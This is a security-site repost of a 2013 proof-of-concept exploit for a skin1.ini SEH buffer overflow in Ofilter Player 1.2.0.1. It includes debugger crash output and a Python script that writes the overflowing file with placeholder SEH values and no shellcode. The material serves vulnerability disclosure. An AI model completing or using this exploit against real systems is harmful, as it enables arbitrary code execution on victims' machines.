首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ofilter Player 1.2.0.1 Buffer Overflow Vulnerability
来源:http://www.cr0security.com 作者:gunslinger 发布时间:2013-09-16  
# Exploit Title     : Ofilter Player Version 1.2.0.1 - (skin1.ini) - SEH Based Buffer Overflow PoC
# Date              : 12-09-2013
# Exploit Author    : gunslinger_ <yuda at cr0security.com>
# Author Homepage   : http://www.cr0security.com
# Price             : Free to try; $19.99 to buy
# Version           : 1.2.0.1 (Probably old version of software and the LATEST version too)
# Vendor            : DigitByte Studio
# Vendor Homepage   : http://www.008soft.com/
# Tested on         : Windows XP SP3
#============================================================================================
# Ofilter Player is Prone to a SEH based Buffer Overflow which allows attacker to execute arbitary code on the victim's machine.
# To trigger the vulnerability the attacker must rewrite file skin1.ini inside /skin folder on Ofilter Player installed folder.
# Then run Ofilter Player, and EIP will be overwritten with the SEH address when the program initialize to read variable from skin1.ini file (see debug result below).
# The Exploit will look like this : [Junk "A" x 360] [6 Bytes Jump + 2Nops ] [pop pop ret address / others] [Shellcode] .
# Crash Triggered + Seh Overwritten .
#============================================================================================
#!/usr/bin/python
'''
0:000> g
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
(658.3f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000018c ebx=00000000 ecx=41414141 edx=0012df77 esi=00000171 edi=00000171
eip=0040161d esp=0012ddc4 ebp=0012df08 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x161d:
0040161d 8b41f4          mov     eax,dword ptr [ecx-0Ch] ds:0023:41414135=????????
0:000> g
(658.3f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=bbbbbbbb edx=7c9032bc esi=00000000 edi=00000000
eip=bbbbbbbb esp=0012d9f4 ebp=0012da14 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
bbbbbbbb ??              ???
0:000> !exchain
0012da08: ntdll!ExecuteHandler2+3a (7c9032bc)
0012df54: bbbbbbbb
Invalid exception stack at cccccccc
'''
from struct import pack
filename    = "skin1.ini"
junk        = "\x41" * 360
nextSEH     = "\xcc\xcc\xcc\xcc" 
SEH         = "\xbb\xbb\xbb\xbb"
  
trigger_seh = junk + nextSEH + SEH
  
ini_content = """[BACKGROUND]
Mask=GoldMask.bmp
Main=GoldMain.bmp
Selected=GoldSelected.bmp
Over=GoldOver.bmp
Disabled=GoldDisable.bmp
  
[BUTTON]
1=ID_FILE_EXIT,273,10,9,9,Exit,FALSE
2=ID_BUTTON_MINIMIZE,261,10,9,9,MINIMIZE,FALSE
3=IDC_BUTTON1_FILELIST_LOOP,229,85,42,21,FILE,FALSE
4=ID_JUMP_FORWARD,103,91,16,15,Skip Forward,FALSE
5=ID_PLAYBACK_NEXTCHAPTER,119,91,16,15,Next,FALSE
6=ID_PLAYBACK_PREVIOUSCHAPTER,23,91,16,15,Previous,FALSE
7=ID_PLAYBACK_STOP,86,91,17,15,Stop,FALSE
8=ID_PLAYBACK_PAUSE,71,91,15,15,Pause,FALSE
9=ID_PLAYBACK_PLAY,53,91,18,15,Play,FALSE
10=ID_JUMP_BACKWARD,38,91,15,15,Skip Backward,FALSE
11=ID_FILE_SELECTDISC,145,85,41,21,Open Media Files,FALSE
12=ID_WEBSITE,117,8,69,16,Website,FALSE
13=%s,186,85,42,21,Open VCD,FALSE
14=ID_POPUP_HELP,251,10,9,9,Popup,FALSE
  
[TRACKBARINFO]
1=IDC_SLIDER1_PLAYBACK_POSITION,Goldbutton1.bmp,Goldbutton1.bmp,23,69,247,6,H,100
2=IDC_SLIDER1_VOLUME,Goldbutton2.bmp,Goldbutton2.bmp,23,79,113,6,H,100
  
[PLAY]
1=ID_PLAYBACK_TIME,Arial,TRUE,TRUE,-14,32768,100,43,160,16,
2=PLAY,Arial,TRUE,TRUE,-14,32768,34,43,50,16,10""" % (trigger_seh)
  
textfile = open(filename , 'wb')
textfile.write(ini_content)
textfile.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mitsubishi MC-WorkX 8.02 Activ
·PCMAN FTP 2.07 STOR Command -
·Vestel TV 42pf9322 - Denial of
·D-Link Devices UPnP SOAP Telne
·Target Longlife Media Player 2
·Sophos Web Protection Applianc
·MS13-053 Win32k Memory Allocat
·Sophos Web Protection Applianc
·eM Client e-mail client v5.0.1
·Agnitum Outpost Internet Secur
·Watchguard Server Center 11.7.
·HP ProCurve Manager SNAC Updat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved